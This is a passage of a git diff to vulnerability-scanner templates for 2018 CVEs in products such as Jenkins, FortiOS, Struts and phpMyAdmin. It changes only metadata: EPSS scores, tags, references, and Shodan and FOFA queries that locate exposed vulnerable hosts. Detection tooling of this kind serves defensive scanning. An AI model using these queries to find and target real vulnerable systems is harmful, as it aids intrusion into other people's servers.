9f8cdce89d..d43d532004 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 - epss-score: 0.00598 - epss-percentile: 0.77958 + epss-score: 0.00422 + epss-percentile: 0.74167 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 276a69b40d..d256b42487 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" fofa-query: icon_hash=81586312 tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index f58ca72664..a7f345b608 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 - epss-percentile: 0.99203 + epss-percentile: 0.99346 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 0a5d6fdb63..d8236014a2 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -26,8 +26,10 @@ info: max-request: 1 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:"-631559155" tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks http: diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 5aeda05166..7b20ad3267 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -14,13 +14,14 @@ info: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - https://www.zend.com/en/products/server/release-notes - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46318 + epss-score: 0.00106 + epss-percentile: 0.43069 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index c9d9f40976..7133c31465 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -22,8 +22,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index 40290d66e0..e063b60ac9 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -23,8 +23,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index 476167d0e2..ffdb3f89da 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -22,8 +22,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index c8ebb8e65a..d5ad65b0ee 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -22,8 +22,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 439df260bd..a32ac3c2fc 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -23,7 +23,7 @@ info: vendor: attribute_wizard_project product: attribute_wizard framework: prestashop - tags: prestashop,attributewizardpro,intrusive,file-upload + tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 0bef67a5c0..4cabdcd22c 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: ipconfigure product: orchid_core_vms - shodan-query: http.title:"Orchid Core VMS" + shodan-query: + - http.title:"Orchid Core VMS" + - http.title:"orchid core vms" fofa-query: title="orchid core vms" google-query: intitle:"orchid core vms" tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index ccdd6b9943..14aa3e5b3e 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - epss-score: 0.81162 - epss-percentile: 0.98059 + epss-score: 0.83856 + epss-percentile: 0.98466 cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 2b8a43c127..ca82948284 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: apache product: tomcat_jk_connector - shodan-query: title:"Apache Tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" fofa-query: title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2018,cve,apache,tomcat,httpd,mod-jk diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 7989de9eaa..752e155c16 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2018,packetstorm,apache,rce,struts,kev diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index fd94e8bf70..c22d2b2667 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve,cve2018,packetstorm,tomcat,redirect,apache diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 22feebf055..92eb351c35 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - epss-score: 0.36029 - epss-percentile: 0.9677 + epss-score: 0.32403 + epss-percentile: 0.97019 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index e029096e0d..1536869918 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01442 - epss-percentile: 0.86338 + epss-percentile: 0.866 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 359bdefacf..fd2453b61a 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.title:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 792a5d855d..baa5ad7390 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -26,8 +26,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1273 cwe-id: CWE-20,CWE-94 - epss-score: 0.97515 - epss-percentile: 0.99982 + epss-score: 0.97466 + epss-percentile: 0.99962 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 9092672f1f..b724358105 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: webgrind_project product: webgrind - fofa-query: app="Webgrind" + fofa-query: + - app="Webgrind" + - app="webgrind" tags: cve,cve2018,lfi,webgrind,webgrind_project http: diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index cf3a399d3d..08c4189776 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2018,cve,fortios,lfi,kev,fortinet http: diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 1f6241640e..5ddc4280bb 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve,cve2018,fortios,xss,fortinet http: diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index d80782ef1c..fc2aa60f54 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve,cve2018,xss,zimbra,synacor http: diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index a521785628..8c99238867 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.15741 - epss-percentile: 0.95409 + epss-percentile: 0.95931 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index cddf9426d8..3a661a3cff 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.96539 - epss-percentile: 0.99521 + epss-score: 0.96192 + epss-percentile: 0.99513 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 02090d2feb..99e6932f5d 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: loytec product: lgate-902_firmware - shodan-query: http.html:"LGATE-902" + shodan-query: + - http.html:"LGATE-902" + - http.html:"lgate-902" fofa-query: body="lgate-902" tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 7769d3d9b3..4863766182 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -13,13 +13,14 @@ info: - https://cxsecurity.com/issue/WLB-2018080070 - https://www.exploit-db.com/exploits/45167/ - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 epss-score: 0.21114 - epss-percentile: 0.95976 + epss-percentile: 0.96408 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index 1db18b2221..ed5edeb9d7 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: jorani_project product: jorani - shodan-query: title:"Login - Jorani" + shodan-query: + - title:"Login - Jorani" + - http.favicon.hash:-2032163853 fofa-query: icon_hash=-2032163853 tags: cve,cve2018,jorani,xss,jorani_project diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index e9bddd04e4..a154fbc631 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index b01dcb1143..6beb396f94 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: bibliosoft product: bibliopac - shodan-query: title:"Bibliopac" + shodan-query: + - title:"Bibliopac" + - http.title:"bibliopac" fofa-query: title="bibliopac" google-query: intitle:"bibliopac" tags: cve,cve2018,xss,bibliopac,bibliosoft diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 417ee6ca3a..6059d6f5b1 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -29,8 +29,8 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress - fofa-query: body="/wp-content/plugins/gift-voucher/" shodan-query: http.html:"/wp-content/plugins/gift-voucher/" + fofa-query: body="/wp-content/plugins/gift-voucher/" tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index d619183fcc..967f04bd8f 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00189 - epss-percentile: 0.55432 + epss-percentile: 0.56242 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 82a7c3ab6a..1fabdefdf7 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: dotcms product: dotcms - shodan-query: http.title:"dotCMS" + shodan-query: + - http.title:"dotCMS" + - http.title:"dotcms" fofa-query: title="dotcms" google-query: intitle:"dotcms" tags: cve2018,cve,redirect,dotcms diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index fe101065ea..ec8b051602 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: kubernetes product: dashboard - shodan-query: product:"Kubernetes" + shodan-query: + - product:"Kubernetes" + - product:"kubernetes" tags: cve,cve2018,kubernetes,k8s,auth-bypass http: diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index a995d5aba7..91fdf83e50 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -20,16 +20,21 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 - epss-score: 0.00177 - epss-percentile: 0.54991 + epss-score: 0.001 + epss-percentile: 0.41301 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"DedeCms" - fofa-query: body="dedecms" + shodan-query: + - http.html:"DedeCms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + - http.html:"dedecms" + fofa-query: + - body="dedecms" + - app="dedecms" tags: cve2018,cve,dedecms,xss http: diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 3e8b1624af..091e45eb21 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: acme product: mini-httpd - shodan-query: 'Server: mini_httpd && 200' + shodan-query: + - 'Server: mini_httpd && 200' + - cpe:"cpe:2.3:a:acme:mini-httpd" + - "server: mini_httpd && 200" tags: cve,cve2018,lfi,mini_httpd,acme http: diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 7f19b027a3..c39437908b 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: tibco product: jasperreports_library - shodan-query: html:"jasperserver-pro" + shodan-query: + - html:"jasperserver-pro" + - http.html:"jasperserver-pro" fofa-query: body="jasperserver-pro" tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 656f2b91d4..85e689d5d6 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -26,9 +26,11 @@ info: max-request: 2 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2018,gogs,lfi,rce,vulhub http: diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index f7e60c03fc..979ca8a95b 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -30,9 +30,9 @@ info: vendor: ninjaforma product: ninja_forms framework: wordpress - publicwww-query: /wp-content/plugins/ninja-forms/ shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ + publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma http: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 3f65170707..865adb4626 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: zyxel product: vmg1312-b10d_firmware - shodan-query: http.html:"VMG1312-B10D" + shodan-query: + - http.html:"VMG1312-B10D" + - http.html:"vmg1312-b10d" fofa-query: body="vmg1312-b10d" tags: cve2018,cve,lfi,modem,router,edb,zyxel diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 5e97818e28..3e88248f87 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: wowza product: streaming_engine - shodan-query: http.title:"manager" product:"wowza streaming engine" + shodan-query: + - http.title:"manager" product:"wowza streaming engine" + - cpe:"cpe:2.3:a:wowza:streaming_engine" fofa-query: title="manager" product:"wowza streaming engine" google-query: intitle:"manager" product:"wowza streaming engine" tags: cve2018,cve,wowza,lfi diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 7cc00d6e2e..93a1a9baa4 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19751 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 + epss-score: 0.00078 + epss-percentile: 0.33785 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 860a40a6b3..581b4f70d4 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19877 cwe-id: CWE-79 - epss-score: 0.00241 - epss-percentile: 0.63554 + epss-score: 0.00204 + epss-percentile: 0.58366 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 90d48ccdab..7950bb3bd4 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-20010 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index cba4b2656c..a886533c65 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2018-20462 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.63916 + epss-percentile: 0.64545 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: jsmol2wp_project + max-request: 2 + vendor: "jsmol2wp_project" product: jsmol2wp framework: wordpress tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project - flow: http(1) && http(2) http: diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 8d404e7272..a45543cd4d 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -29,9 +29,11 @@ info: max-request: 2 vendor: roxyfileman product: roxy_fileman - google-query: intitle:"Roxy file manager" shodan-query: http.title:"roxy file manager" fofa-query: title="roxy file manager" + google-query: + - intitle:"Roxy file manager" + - intitle:"roxy file manager" tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman http: diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 4135025d8b..b5ace6eb8a 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve2018,cve,atlassian,jira,xss http: diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index aba5e76e50..4154a5580e 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 938d71b76f..594ed4bde9 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -28,7 +28,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2018,atlassian,confluence,xss http: diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 0394c5bda9..5ce7802bfc 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ 